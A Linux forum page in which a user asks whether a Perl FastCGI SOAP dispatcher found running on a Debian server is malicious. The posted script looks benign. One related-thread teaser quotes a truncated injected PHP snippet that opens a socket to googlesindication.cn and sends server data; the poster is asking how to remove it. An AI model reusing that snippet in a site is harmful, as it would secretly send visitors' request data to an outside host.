Malicious perl script Post: 302992334

Sponsored Content

Operating Systems Linux Debian Malicious perl script Post 302992334 by dadprpus on Thursday 23rd of February 2017 08:54:33 PM

02-23-2017

Registered User

tried to do the

Code:

1s -1 /proc/4600

and the other. Terminal said there was no such thing as 1s. I am using -bash: in front of everything but the| grep perl revealed 2 instances of perl.
usr/bin/perl and usr/sbin/hspc-plugin-rpc.fcgi which contained

Code:

use strict;
use CGI::Fast();

use Pod::WSDL;
use SOAP::Lite;
use SOAP::Transport::HTTP;

use HSPC::Config;
use HSPC::Plugin::SOAP::Common;
use HSPC::Plugin::SOAP::Struct;
use HSPC::Plugin::SOAP::PP;

$ENV{"plugin_soap_common"} = HSPC::Plugin::SOAP::Common->new();

my $remote_uri = "https://".$CONFIG{"SERVER_NAME"}.":".$CONFIG{"SERVER_PORT"}."/HSPC/Plugin/SOAP";
my $local_uri = "https://127.0.0.1:".$CONFIG{"SERVER_PORT"}."/HSPC/Plugin/SOAP";

my $cgi = SOAP::Transport::HTTP::FCGI
	-> dispatch_with({
		$remote_uri."/WebServices"	=> "HSPC::Plugin::SOAP::WebServices",
		$local_uri."/WebServices"	=> "HSPC::Plugin::SOAP::WebServices",
		$remote_uri."/Common"		=> "HSPC::Plugin::SOAP::Common",
		$local_uri."/Common"		=> "HSPC::Plugin::SOAP::Common",
		$remote_uri."/PP"			=> "HSPC::Plugin::SOAP::PP",
		$local_uri."/PP"			=> "HSPC::Plugin::SOAP::PP",
		$remote_uri."/PM"			=> "HSPC::Plugin::SOAP::PM",
		$local_uri."/PM"			=> "HSPC::Plugin::SOAP::PM",
		$remote_uri."/DM"			=> "HSPC::Plugin::SOAP::DM",
		$local_uri."/DM"			=> "HSPC::Plugin::SOAP::DM",
	})
	-> handle
;

0;

I have no idea if this is suppose to be here or not.

dadprpus

View Public Profile for dadprpus

Find all posts by dadprpus

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ...

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated...

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -...

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl...

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"...

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not...

LEARN ABOUT DEBIAN

vend::soap::transport

Vend::SOAP::Transport(3pm)				User Contributed Perl Documentation				Vend::SOAP::Transport(3pm)

NAME

       SOAP::Transport::IO - Server side IO support for SOAP::Lite

SYNOPSIS

	 use SOAP::Transport::IO;

	 SOAP::Transport::IO::Server

	   # you may specify as parameters for new():
	   # -> new( in => 'in_file_name' [, out => 'out_file_name'] )
	   # -> new( in => IN_HANDLE	  [, out => OUT_HANDLE] )
	   # -> new( in => *IN_HANDLE	  [, out => *OUT_HANDLE] )
	   # -> new( in => *IN_HANDLE	  [, out => *OUT_HANDLE] )

	   # -- OR --
	   # any combinations
	   # -> new( in => *STDIN, out => 'out_file_name' )
	   # -> new( in => 'in_file_name', => *OUT_HANDLE )

	   # -- OR --
	   # use in() and/or out() methods
	   # -> in( *STDIN ) -> out( *STDOUT )

	   # -- OR --
	   # use default (when nothing specified):
	   #	  in => *STDIN, out => *STDOUT

	   # don't forget, if you want to accept parameters from command line
	   # *HANDLER will be understood literally, so this syntax won't work
	   # and server will complain

	   -> new(@ARGV)

	   # specify path to My/Examples.pm here
	   -> dispatch_to('/Your/Path/To/Deployed/Modules', 'Module::Name', 'Module::method')
	   -> handle
	 ;

DESCRIPTION

COPYRIGHT

       Copyright (C) 2000-2001 Paul Kulchenko. All rights reserved.

       This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself.

AUTHOR

       Paul Kulchenko (paulclinger@yahoo.com)

perl v5.14.2							    2010-03-25						Vend::SOAP::Transport(3pm)